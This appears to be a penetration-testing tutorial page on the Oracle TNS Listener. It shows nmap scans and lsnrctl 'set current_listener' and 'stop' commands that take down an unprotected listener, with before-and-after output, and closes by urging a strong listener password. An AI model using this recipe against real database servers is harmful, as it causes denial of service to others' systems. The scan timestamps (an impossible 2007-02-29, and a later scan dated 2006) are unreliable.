The Web Local
 

 

 

OracleTNSLSNR

 

The Oracle TNS Listener is the lynchpin between a user/web server offering connection and the back-end database.  As such access to it should be restricted.  The relevant files that control the listener are:

 

  • $ORACLE_HOME/bin/lsnrctl - This is the actual Listener control program

  • $ORACLE_HOME/network/admin/listener.ora - The actual TNS Listener config file

  • $ORACLE_HOME/bin/tnslnsr - The actual listening process.

 

This utility carries out the same functions as WinSid, but there are also a number of other functions this little tool will perform:

 

Command: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

 

****Notice the stop command (Easy DoS that!!)****

 

Note: - I have found this tool to work on an adhoc basis, the stability I believe is in question.  Obviously all the commands listed above should work with Oracle 9i and below but Oracle 10g and above, only the version command will return any interesting data.  All other commands will error due to the security restrictions applied to the listener in 10g.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Obviously if no password has been assigned to the listener a malicious user can have a field day with your link to your backend database server i.e.:

 

Before we issue any commands, we confirm the TNS listener port is open:

Step 1 - Ensure the listener is accepting connections

C:\nmap-4.21>nmap -n -p 1521 200.100.100.67

Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2007-02-29 12:24 GMT Daylight Time
Interesting ports on 200.100.100.67:
PORT STATE SERVICE
1521/tcp open oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)

Nmap finished: 1 IP address (1 host up) scanned in 0.281 seconds 

Step 2 - Use the utility above and insert the command STOP and press connect.

alternatively use the on-board Oracle LSNRCTL utility that controls the listener:

 

LSNRCTL> set current_listener 200.100.100.67

LSNRCTL> stop

 

Step 3 - Confirm the DoS has worked:

C:\nmap-4.21>nmap -n -p 1521 200.100.100.67

Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2006-09-29 12:25 GMT Daylight Time
Interesting ports on 200.100.100.67:
PORT STATE SERVICE
1521/tcp closed oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)

Nmap finished: 1 IP address (1 host up) scanned in 0.282 seconds

 

The moral of the story is:  ASSIGN the listener a STRONG password!

 

 

IT Security News:

 

Pen Testing Framework:

 

Latest Tool Reviews: